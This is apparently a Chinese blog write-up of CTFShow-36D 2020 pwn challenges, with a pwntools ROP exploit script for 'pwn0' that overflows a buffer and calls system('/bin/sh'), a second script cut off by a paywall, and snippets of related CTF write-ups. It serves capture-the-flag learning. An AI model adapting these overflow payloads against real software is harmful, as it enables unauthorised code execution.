CTFShow-36D 2020 pwn

最新推荐文章于 2024-04-15 18:47:29 发布
最新推荐文章于 2024-04-15 18:47:29 发布
阅读量341 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42689613/article/details/116096450
版权
本文详细介绍了CTFShow-36D 2020比赛中pwn0挑战的解决过程,重点讨论了PWN_MagicString漏洞。作者在尝试使用onegadget时遇到问题,由于泄露libc地址时的错误,导致多次尝试失败。在转而尝试注入shellcode的过程中,发现可执行段较短并存在分隔,最终通过调整和验证onegadget正确使用,意识到是printf泄露时的错误导致了困扰。作者提醒,在未来遇到类似情况时,务必检查泄露的数据准确性。
摘要由CSDN通过智能技术生成

目录

pwn0

#!/usr/bin/env python2
from pwn import *

arch = "amd64"
filename = "pwn0"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)
pop_rdi_addr=0x00000000004006d3
sys_addr=0x00000000004004E0
binsh_addr=0x601040    #***
# libc

def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("")
    payload=b'a'*(0x28)+p64(pop_rdi_addr)+p64(binsh_addr)+p64(sys_addr)
    io.sendline(payload)
    io.interactive()
main()

PWN_MagicString

#!/usr/bin/env python2
from pwn import *

arch = "amd64"
filename = "PWN_MagicString"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)
pop_rdi=0x0000000000400733
ti_addr=0x60104D
binsh_addr=0x601048
magic_addr=0x000000000040062D
sys_addr=0x00000000004004F0
# libc


def b(addr):
    bk = "b *$rebase" +
最低0.47元/天 解锁文章
qingmu-z
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFSHOW 36D杯CTF(pwn部分wp)
weixin_44296844的博客
05-04 1868
PWN WP 感谢1p0ch师傅 最近参加了ctf.show举办的一个比赛,做了一下pwn题,以下是我的一些wp,由于本人能力有限,菜的一批,如果有什么不对的地方,请多包含。 PWN_签到 签到题直接nc上去以后发现考察的是linux的基本操作,程序过滤掉了空格,cat,但是我们可以ls查看 more<flag 这里<可以绕过空格 PWN_babyFmts...
BIT CTF 2020 (三)(PWN
weixin_43869733的博客
07-17 372
BIT CTF 2020 (三)(持续更新)(PWNPWN: 1、meowcat 签到题 ,ctrl c+ctrl v 去linux得flag flag{meow_meow_netcat}
CTFshow-36D杯-pwn-babyheap
SCP000111的博客
04-11 739
参考博客https://www.xl-bit.cn/index.php/archives/15/ 再找wp的时候找了好久,终于找到该师傅的exp,希望后来人能有wp看。不过可能该师傅的博客解码有点问题,导致他的exp不能直接跑通。这里做了整理。 代码如下: 2022.4.11 证明可以跑通 from pwn import * def new(content): p.sendlineafter('>>','1') p.sendafter('your 36D:',content) def fre
ctfshow-36D杯-pwn(1024_happy_unlink )
kissyunlei的博客
01-12 256
可以利用unlink把堆得地址挪移到target处,这样利用edit就可以把atoi地址写入进去,然后show得到,最后在修改堆地址就可以把atoi替换成system,传入payload成功getshell。在edit函数上存在溢出。
CTFshow 36D
Je3Z的博客
05-07 1273
WUSTCTF_朴实无华_Revenge 这个题真的感觉自己没脑子,五一玩傻了。。。。 <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); function isPalindrome($str){ $len=strlen($str); $l=1; $k=intval($len/2)+1; for($j=0;$j<$k
CTFSHOW-PWN入门-前置基础(pwn5-pwn12)
2402_84133101的博客
04-13 399
mov eax,[esi]将esi中的值作为地址,然后将该地址单元的值赋给eax,即找到080490E8地址单元中的值赋给eax。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov eax,[ecx]将ecx寄存器的值作为地址,将该地址单元中的值赋给eax。
ctfshow reverse36D
m0_58348028的博客
02-20 434
目录 签到 签到 发现这个题只要理解清楚他do-while循环中的东西就好了 推测v8即为flag 经过下面的处理之后才出flag上代码 int main() { char flag[31]; int v4; int v6; // [rsp+4h] [rbp-8Ch] unsigned int v7; // [rsp+8h] [rbp-88h] char v8; int v9[31]; char v10[4]; // [rsp+8Ch] [rbp-4h]
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
CTFshow-pwn入门-Test_your_nc
T1ngSh0w的博客
06-17 1922
ctfshow-pwn入门-test_your_nc-pwn0-pwn4
CTFshow PWN0
qq_60737948的博客
10-02 298
pwn开始的地方
CTFshow-pwn入门-前置基础pwn29-pwn31
T1ngSh0w的博客
06-21 1591
CTFshow-pwn入门-前置基础pwn29-pwn31(绕过PIE-pwn31)
CTFshow-PWN-Test_your_nc(pwn0-pwn4)
最新发布
Welcome To Myon'Blog !
04-15 1174
连上,等它程序执行完你可以直接来到 shell 界面执行命令,获取 flag。
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 3563
本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
ctfshow pwn
zip471642048的博客
06-04 476
ctfshow pwn系列
ctfshow刷题笔记(pwn篇)
Gygert的博客
03-16 3498
一入pwn坑深似海,从此web是路人 目录pwn02pwn03 pwn02 常规checksec一下 扔进IDA 点进pwnme()函数看看,明显的栈溢出 搜索字符串有/bin/sh 直接淦它 from pwn import* io=remote('111.231.70.44',28054) #io=process('./pwn02') bin_sh=0x0804850F payload=b'a'*13+p32(bin_sh) io.sendline(payload) io.interactive(
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 6134
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
ctfshow 内部赛 pwn 签到题
SCP000111的博客
11-16 1676
ctfshow 内部赛 pwn 签到题 找了在刷题的中,不会做这道题,找了好久没找到wp,搞了几天,还怀疑题目出错了,结果一看有最近13天前做出来的,又认真在搞。最终搞出来了,原来是csu,不想让后来人向我一样没有wp可以看,解出来马上就写了博客hhhh。 先放图片,2021.11.16该代码可行 这个我找了好久。都没找到wp,但是我看到了一个人的博客,无意间发现他的题目似乎与这道题一样,于是尝试求解,解出,在这里感谢下作者。这里 作者是偏有宸机,他那里有更好的解释。Ret2libc_64[csu及get
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
ctfshow PWN
08-23
根据引用和引用中的内容,ctfshow函数是一个简单的栈溢出漏洞的示例程序。在32位程序中,返回地址一般是ebp + 4。而在64位程序中,返回地址一般是rbp + 8。通过利用栈溢出漏洞,我们可以修改返回地址,从而控制程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值